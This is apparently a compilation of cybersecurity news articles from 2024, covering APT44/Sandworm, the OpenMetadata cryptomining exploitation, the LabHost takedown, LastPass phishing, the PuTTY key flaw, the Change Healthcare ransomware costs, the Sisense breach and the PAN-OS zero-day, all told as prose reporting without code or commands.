We have seen three primary hacktivist personas since the war began in February 2022, but CyberArmyofRussia_Reborn is a particularly notable one because of how closely we've linked this group with actual APT44 disruptive operations. In one case, we saw a mismatch essentially between a hackivist car posting a claim for a wiper operation before the wiper operation actually successfully was deployed. So there's clearly a very close coordination between APT44 and CyberArmyofRussia_Reborn. There are several different reasons why CyberArmyofRussia_Reborn may be utilized in this way. They could be used in some cases to sort of take the effects of the war off of the front and make them amplified into civil society - especially since a lot of these wiper attacks aren't actually hitting military targets, they're hitting government and civil society organizations for the most part. So CyberArmyofRussia_Reborn also has elements to it that, even though they're coordinating with APT44, they are definitely doing some weird like DDoS stuff that - who knows if that's necessarily tied to - APT44 or not so we have to be a bit careful with our assessment there.

Lindsey O’Donnell-Welch: Thank you both so much for coming on, especially as we continue to look at where Sandworm and APT44 is going in the future - should be really interesting to see how this group continues to evolve.

Threat actors have been exploiting known vulnerabilities in open-source platform OpenMetadata in order to access Kubernetes workloads and use them for cryptomining.

The flaws (CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848 and CVE-2024-28254) being targeted were previously disclosed and patched in versions of OpenMetadata prior to 1.3.1 on March 15. OpenMetadata serves as a central repository to help users manage metadata across different data sources.

Researchers with Microsoft’s threat intelligence team in a Wednesday analysis said that they have observed attackers exploiting the vulnerabilities since the start of April, in order to bypass authentication and achieve remote code execution. Kubernetes has previously been at the center of attacks leveraging cryptocurrency miners, including a large campaign in 2020 launched against Kubernetes clusters that abused exposed Kubernetes dashboards.

“For initial access, the attackers likely identify and target Kubernetes workloads of OpenMetadata exposed to the internet,” according to researchers. “Once they identify a vulnerable version of the application, the attackers exploit the mentioned vulnerabilities to gain code execution on the container running the vulnerable OpenMetadata image.”

After exploiting these flaws, attackers perform a number of reconnaissance measures on the system, including reading the environment variables of the workloads - which might contain credentials for services enabling lateral movement - and running a series of commands to gather information about the victim’s environment like the network and hardware information, OS version and active users. The attackers also send ping requests to a publicly available service, in this case OAST domains that are associated with an open-source tool called Interactsh, which helps to detect out-of-band interactions.

“OAST domains are publicly resolvable yet unique, allowing attackers to determine network connectivity from the compromised system to attacker infrastructure without generating suspicious outbound traffic that might trigger security alerts,” said researchers. “This technique is particularly useful for attackers to confirm successful exploitation and validate their connectivity with the victim, before establishing a command-and-control (C2) channel and deploying malicious payloads.”

After this initial reconnaissance phase, attackers then download cryptomining malware from a remote server located in China, before executing the malware. The attackers also added a personal note to victims, saying their actions are harmless and that they need the money, and asking for donations in Monero.

“Lastly, for hands-on-keyboard activity, the attackers initiate a reverse shell connection to their remote server using Netcat tool, allowing them to remotely access the container and gain better control over the system,” said researchers. “Additionally, for persistence, the attackers use cronjobs for task scheduling, enabling the execution of the malicious code at predetermined intervals.”

Researchers recommend that users of OpenMetadata check the clusters that run their OpenMetadata workload and ensure that the image is updated to version 1.3.1 or later. If OpenMetadata is exposed to the internet, researchers urged users to use strong authentication.

Law enforcement agencies in the United Kingdom have disrupted a large-scale cybercrime group that ran a phishing-as-a-service operation known as LabHost, arresting nearly 40 people and taking down the LabHost infrastructure.

LabHost began operations in 2021 and authorities say that the group’s customers hit nearly 70,000 victims in the U.K. alone, and many more globally. As part of the disruption carried out this week, authorities sent messages to 800 LabHost users telling them that they are part of the investigation.

“We’ve shown them we know how much they’ve paid to LabHost, how many different sites they’ve accessed and how many lines of data they’ve received. Many of these individuals will remain the focus of investigation over the coming weeks and months,” the Metropolitan Police said in a release.

The LabHost platform was one of many such operations that offered users a number of services, including the ability to replicate the login pages for popular brands, allowing them to capture credentials from victims. Users could choose from a selection of pre-made templates or request customized ones. LabHost also offered users the ability to employ its custom LabRat malware tool, which can proxy connections between the victim and the targeted phished organization, allowing users to steal victims’ 2FA codes. At the time of this week’s disruption, law enforcement officials estimated that LabHost had about 2,000 active users.

The takedown operation was a joint effort between the Metropolitan Police, Europol, the National Crime Agency, and the City of London Police, along with other agencies. A number of technology companies also worked on the operation, including Microsoft, Trend Micro, Intel 471, Chainalysis, and the Shadowserver Foundation.

“This operation again demonstrates that UK law enforcement has the capability and intent to identify, disrupt and completely compromise criminal services that are targeting the UK on an industrial scale,” said Adrian Searle, Director of the National Economic Crime Center in the National Crime Agency.

Authorities said they arrested 37 people in this week’s operation, and are continuing to investigate other suspects. The LabHost takedown is the latest in a series of such operations by European law enforcement authorities targeting fraud, phishing, and ransomware groups in recent months. The largest of those operations was the takedown of the LockBit ransomware group and its infrastructure in February. That operation targeted LockBit’s operators as well as its infrastructure and also seized about 200 cryptocurrency accounts associated with its operators. Two suspected LockBit operators were arrested at the time, as well.

The LockBit and LabHost takedowns are prime examples of the cooperative efforts between law enforcement and security companies that are required to disrupt modern cybercrime operations. Many of these groups are transnational and they target victims around the world, requiring cooperation among agencies in many different countries, as well as work by threat intelligence and research teams at tech companies behind the scenes.

“Fraud is an international crime demanding a global approach. This operation is a fantastic demonstration of law enforcement agencies around the world coming together to crack down on criminals trying to take advantage of people in the UK,” said Security Minister Tom Tugendhat.

LastPass is warning of a phishing campaign designed to steal users’ master passwords and give attackers access to their password manager accounts.

In order to convince LastPass users to hand over their passwords, attackers used a mix of phone calls, phishing emails and a phishing page under the domain “help-lastpass[.]com,” which has since been taken down. If they were able to successfully obtain the users’ master passwords, attackers would log into the victims’ accounts and lock them out by changing their primary phone numbers, email addresses and the master password itself.

“Initially, we learned of a new parked domain (help-lastpass[.]com) and immediately marked the website for monitoring should it go live and start serving a phishing site intended to imitate our login page or something similar,” according to Mike Kosak, senior principal intelligence analyst with LastPass, in a Wednesday statement. “Once we identified that this site went active and was being used in a phishing campaign against our customers, we worked with our vendor to take down the site.”

Password managers like LastPass are top targets for attackers exactly because of their functionality as a centralized location for valuable credentials. In 2022, attackers were able to steal some LastPass customer data and gain access to the LastPass cloud storage service. Last week, the company said that a LastPass employee was unsuccessfully targeted by a deepfake audio call that impersonated the company CEO Karim Toubba.

LastPass also warned of another wide-scale phishing attack targeting its users last year, which included a link to a phishing page hosted on subdomains of “customer-lastpass[.]su.” That campaign had a global reach and targeted a variety of sectors, including 87 of the company's own employees.

While LastPass didn’t specify how many customers were targeted in its latest phishing campaign disclosed this week, and how many of the incidents were successful, the company said customers were receiving calls from 888 numbers claiming their accounts had been accessed from a new device, and instructing them to press “1” to enable access and “2” to block it. When customers pressed “2,” they were told they would receive a call shortly to “close the ticket.” They would then receive a call from someone with an American accent impersonating a LastPass employee. The caller could then send the victims an email, purporting to help them reset access to their account, which would actually take them to the phishing page in an attempt to steal their credentials.

The campaign, first unearthed by Lookout, appears to be linked to the CryptoChameleon phishing kit, which is a phishing-as-a-service offering for cybercriminals allowing them to create fake SSO sites using fraudulent branding in order to persuade victims to type in their credentials. CryptoChameleon, first discovered in February, has previously been used to target cryptocurrency platforms like Binance and Coinbase, as well as the Federal Communications Commission (FCC).

LastPass warned users not to respond to suspicious calls, texts and emails from people claiming to be from LastPass, and to alert them if these messages are received. The company said that no one at LastPass would ever ask customers for their master passwords.

“We have worked hard to disrupt this phishing campaign and have had the initial phishing site taken down,” said Kosak. “However, as the initial phishing kit itself continues to offer LastPass branding, we are sharing this information so that our customers can be aware of these tactics and take the appropriate response should they receive a suspicious call, text, or email.”

Recent activity by the well-known Sandworm group - which researchers with Mandiant have started calling APT44 - relies on a mix of espionage efforts and hacktivist personas, and shows how the group continues to pose a “persistent, high severity threat” to governments and critical infrastructure entities globally.

The threat group, which has been around for at least 15 years and is known for being affiliated with the Russian GRU, has played key roles in cyber operations supporting Russia’s military campaign as it enters its third year of war in Ukraine. Though the group is known for its destructive malware attacks, Mandiant researchers in a Wednesday analysis said that recently APT44 has increasingly conducted espionage-related attacks that likely support Russian military operations, such as intercepting communications via mobile networks or devices in order to gain a tactical military advantage. For instance, in August 2023 multiple governments warned of APT44’s Infamous Chisel malware used to collect information about Android devices and applications specific to the Ukrainian military. Even with the ongoing war researchers have seen the group launching espionage operations across North America, Europe, the Middle East, Central Asia and Latin America.

“APT44 is the most brazen threat actor there is, in the midst of one of the most intense campaigns of cyber activity we've ever seen, in full-blown support of Russia’s war of territorial aggression,” said Dan Black, principal analyst on the cyber espionage team with Google's Mandiant. “There is no other threat actor today that is more worthy of our collective attention, and the threat APT44 poses is evolving rapidly. Over the course of the war, we have seen APT44’s posture shift away from disruption as its primary focus toward espionage to provide battlefield advantage to Russia’s conventional forces.”

One emerging feature of APT44’s campaigns has been its emphasis on creating psychological operations that amplify the impact of its campaigns. For instance, the group has created hacktivist identities on Telegram channels to claim responsibility for its various disruptive wartime operations. Due to various clues including infrastructure similarities, Google’s Threat Analysis Group assesses that APT44 has created and controlled a persona called “CyberArmyofRussia_Reborn,” for instance. In January, this group’s Telegram channel posted videos that took credit for the manipulation of human machine interfaces used in water utilities in the U.S. and Poland. Mandiant researchers said they couldn’t independently verify these claims of intrusion or their links to APT44, but noted that impacted U.S. utility officials have publicly acknowledged the incidents at the same entities that the CyberArmyofRussia_Reborn video advertised as victims.

“Given the active and persistent threat to governments and critical infrastructure operators globally, Mandiant has decided to graduate the group into APT44.”

“The attacks on the water sector and other critical infrastructure in the US and Europe by Cyber Army of Russia Reborn (CARR) are very serious, though it’s not clear if this was actually the GRU,” said John Hultquist, Mandiant’s chief intel analyst. “APT44 has leveraged the hacktivist group as a front for its operations before, but it is possible others have become associated with CARR and are operating outside of the GRU’s control or direction. Nonetheless, the GRU’s proximity to this activity is worrying.”

The Russian threat group, which has been attributed by the U.S. Department of Justice and by the UK National Cyber Security Centre to the Russian GRU Unit 74455, has been behind several high-profile attacks, particularly leveraging malware with destructive functionalities in the 2010s. In 2015 and 2016, the group was behind malware attacks against Ukraine’s electric power grids using malware known as BlackEnergy, Industroyer and KillDisk. The group also launched the NotPetya malware attacks in 2017 against companies worldwide and the Olympic Destroyer malware campaigns against the 2018 PyeongChang Winter Olympic Games.

Part of what sets the group apart is its ability to specialize in various missions like collecting intelligence or conducting information operations, and integrate them into a unified playbook over time, said researchers. APT44 has also used a diverse range of tactics, living-off-the-land techniques and and initial access methods, from phishing or exploiting known vulnerabilities, to targeted supply-chain compromises.

Mandiant on Wednesday announced it has “graduated” Sandworm into APT44. Mandiant researchers will frequently “graduate” threat clusters to named APTs as they collect more information over time and their knowledge of the group’s activities increases. APT44 has been extensively tracked by Mandiant for more than a decade, but researchers said that the near-term threat that the group poses for undermining elections in 2024 - a year where at least 64 countries worldwide will hold elections - is one particular factor.

“Mandiant continues to see operations from the group that are global in scope in key political, military, and economic hotspots for Russia,” said Mandiant researchers in their analysis on Wednesday. “Given the active and persistent threat to governments and critical infrastructure operators globally, Mandiant has decided to graduate the group into APT44.”

Many versions of the PuTTY client have a subtle vulnerability that can allow an attacker to compromise some private keys and then forge signatures and log into any remote servers on which those keys are used.

The bug affects versions 0.68-0.80 of PuTTY, a popular client used for SSH, Telnet, and other remote communication protocols, and derives from the fact that when using a specific NIST elliptic curve, the client produces biased ECDSA nonces. The weakness only applies to 521-bit ECDSA keys generated when using the NIST P521 curve. In order to exploit this vulnerability, an attacker would need to see a few dozen signatures from the private key, but that is a plausible scenario. Researchers at Ruhr University in Germany discovered the flaw and published details of it on Monday. The bug has been fixed in PuTTY 0.81.

“The PuTTY client and all related components generate heavily biased ECDSA nonces in the case of NIST P-521. To be more precise, the first 9 bits of each ECDSA nonce are zero. This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques. These signatures can either be harvested by a malicious server (man-in-the-middle attacks are not possible given that clients do not transmit their signature in the clear) or from any other source, e.g. signed git commits through forwarded agents,” the advisory from the Ruhr University researchers says.

“Luckily, client signatures are transmitted within the secure channel of SSH, requiring a malicious server to acquire such signatures. If the key has been used to sign arbitrary data (e.g., git commits by forwarding Pageant to a development host), the publicly available signatures (e.g., on GitHub) can be used as well.”

PuTTY has been around for more than 20 years and while it was developed for Windows originally, it’s open source and has been ported to some other operating systems. The client can be used for remote sessions on servers, file transfers, and other functions. The Ruhr University researchers said that users should discard any client keys generated by the NIST P521 curve on affected versions of PuTTY.

“All NIST P-521 client keys used with PuTTY must be considered compromised, given that the attack can be carried out even after the root cause has been fixed in the source code (assuming that ~60 pre-patch signatures are available to an adversary),” the advisory says.

In its 2024 first quarter earnings, Change Healthcare parent UnitedHealth Group reported that the massive ransomware attack that was uncovered at the end of February has cost the company $872 million so far.

Remediation efforts for the attack are still ongoing, but UnitedHealth Group’s earnings offer a glimpse into the financial costs of the attack in the eight weeks since it was announced. That figure includes direct response costs ($593 million), including costs for supporting the company’s platform restoration and those tied to increased medical care expenditures after the company suspended care management activities to help care providers with their workflow processes. Other financial impacts were tied to business disruption impacts ($279 million) from the attack.

"The company continues to make significant progress in restoring the affected Change Healthcare services while providing financial support to impacted health care providers," according to UnitedHealth Group’s Tuesday earnings release. "To date, the company has provided over $6 billion in advance funding and interest-free loans to support care providers in need."

Overall, in its first quarter earnings UnitedHealth Group said its revenue increased almost $8 billion year-over-year to $99.8 billion. The company, however, is still grappling with the fallout from the ransomware attack that occurred in late February, which included a reported $22 million payment to the BlackCat ransomware affiliates behind the attack and led to delays in patient care, prescription orders and payments, impacting providers, pharmacies and hospitals across the U.S.

Though most systems are online and claims processing is underway, UnitedHealth Group is now facing a second ransom demand from another ransomware group affiliate that claims to have patient and corporate data stolen from Change Healthcare’s systems.

The federal government has also stepped in, with the Department of Health and Human Services Office for Civil Rights in March opening an investigation into the incident and whether protected health information was compromised. In a new update on its website on Monday, Change Healthcare said that at this time, the company “knows that the data had some quantity of personal health information and personally identifiable information.”

“We are working to determine the quantity of impacted data, and we are fully committed to providing notifications to impacted individuals when determinations are able to be made — and will work with the Office of Civil Rights and our customers in doing so,” according to UnitedHealth Group’s update this week.

Lasting Damages

While UnitedHealth Group’s financial reports are one way to gauge the impact of the ransomware attack, the incident has a far-reaching and ongoing effect on many other organizations across the industry that's harder to pinpoint.

In a Tuesday hearing by the House Energy and Commerce Subcommittee on Health - titled "Examining Health Sector Cybersecurity in the Wake Of The Change Healthcare Attack" - government and healthcare entities talked about the ongoing impacts of the attack. Representatives from UnitedHealth Group did not participate in the hearing.

Adam Bruggeman, an orthopedic surgeon with the Texas Spine Center, said that the cyberattack led to his practice being unable to process claims and receive payments. While Bruggeman said his practice had enough cash reserves to continue operating without receiving payments during the outage, the practice still faced a number of significant challenges in dealing with the fallout from the attack. For instance, while the practice had the option to change over to an alternative clearinghouse a few weeks after the attack, not all insurers allowed the practice to do that for claim submissions, because integrating with a new clearinghouse is costly and time consuming.

“This made switching impractical,” said Bruggeman. “Instead, we had to either hold claims in limbo or resort to submitting them through individual online portals.”

The practice also could not receive ERAs from insurers, which typically accompany deposits in their bank account and give important information about which bills have been paid. This led to many patients receiving automated bills, which should have been marked as paid, leading to confusion and frustration from patients, said Bruggeman.

Another ongoing issue is the lack of transparency around the attack. Scott MacLean, Board Chair of the College of Healthcare Information Management Executives (CHIME) and SVP and CIO of MedStar Health, said that from the start, many members of CHIME “found themselves struggling to navigate the most significant cyber incident to hit our sector.” IoCs were not widely shared immediately, for instance, and for a certain period of time organizations weren’t sure which systems were safe to reconnect to.

“Following the attack, there was a dearth of information and our members found themselves in the dark navigating an extremely complex and far-reaching attack with few answers, and few options for continuing operations,” said MacLean. “The lack of answers hampered and continues to hamper recovery efforts.”

The Cybersecurity and Infrastructure Security Agency is responding to an intrusion affecting Sisense, a major provider of business and data analytics, that involves the compromise of customer data.

The agency released an alert about the incident on Thursday morning and Sisense has reportedly notified customers but has not released any public statements about the intrusion yet. CISA said independent security researchers discovered the compromise, and the agency urged Sisense customers to rotate their credentials.

“CISA is taking an active role in collaborating with private industry partners to respond to this incident, especially as it relates to impacted critical infrastructure sector organizations. We will provide updates as more information becomes available,” the CISA advisory says.

Sisense provides a number of business analytics products, including a platform and a cloud-based service. The company lists a slew of high-profile customers on its site, including NASDAQ, AirCanada, and others. The platform typically requires quite a lot of permissions and deep integration into enterprises. Researchers say that the information the unnamed attackers were able to exfiltrate from Sisense includes credentials and authentication token for some of the apps that the platform integrates with.

Late on Thursday, Sisense CISO Sangram Dash sent a communication to customers about the incident and outlined a long list of actions they should take in order to protect their organizations, including changing any and all Sisense-related passwords, changing passwords for all Sisense users, and logging all users out of the platform. For organizations that employ single sign-on, the company also recommends changing shared secrets for SSO, rotating the X.509 certificate for the SSO SAML provider, and changing the OpenID client secret for companies that have implemented OpenID.

“Our customers must reset any keys, tokens, or other credentials in their environment used within the Sisense application,” the message says.

Sisense has not released any public statements about the incident yet.

UPDATE - Patches are now available for a critical-severity vulnerability in Palo Alto Network's PAN-OS software for firewalls. The flaw, first disclosed on Friday, is currently being exploited in the wild.

The vulnerability (CVE-2024-3400) ranks 10 out of 10 on the CVSS scale, and stems from a command injection issue in the GlobalProtect feature of PAN-OS. The flaw could enable unauthenticated attackers to execute arbitrary code with root privileges on the firewall. The flaw can lead to successful exploitation on specific OS versions - PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls - if the configurations for both GlobalProtect gateway and device telemetry are enabled.

“Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024,” according to the advisory on Friday by Palo Alto Networks. “Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.”

In its advisory, Palo Alto Networks said that users can verify if they have the GlobalProtect gateway and device telemetry configured by checking for entries in the firewall web interface.

The hotfix releases won’t be available until Sunday, but Palo Alto Networks has provided customers with several mitigations in the meantime, including temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version.

Details of the Exploitation

Volexity researchers on Friday said that they discovered a threat actor leveraging the vulnerability, which they track as UTA0218.

The researchers first identified the zero-day exploitation of the flaw on April 10, after receiving alerts about suspicious network traffic from the firewall of one of its customers. However, researchers said that the earliest evidence of attempted exploitation tracks back to March 26.

"A subsequent investigation determined the device had been compromised," said Volexity researchers in a Friday analysis of the flaw. "The following day, April 11, 2024, Volexity observed further, identical exploitation at another one of its NSM customers by the same threat actor."

The attacker was able to remotely exploit the bug in order to create a reverse shell and download post-exploitation tools, including a novel python-based backdoor.

"The attacker focused on exporting configuration data from the devices, and then leveraging it as an entry point to move laterally within the victim organizations," according to Volexity's threat research team. "During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests."

Impacted users are urged to apply mitigations and patches when available. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday also added the flaw to its known exploited vulnerabilities catalog, where it lists flaws that are “frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.” Federal agencies have a deadline of April 19 to patch the flaw.

This article was updated on April 16 to reflect that patches are now available for the flaw.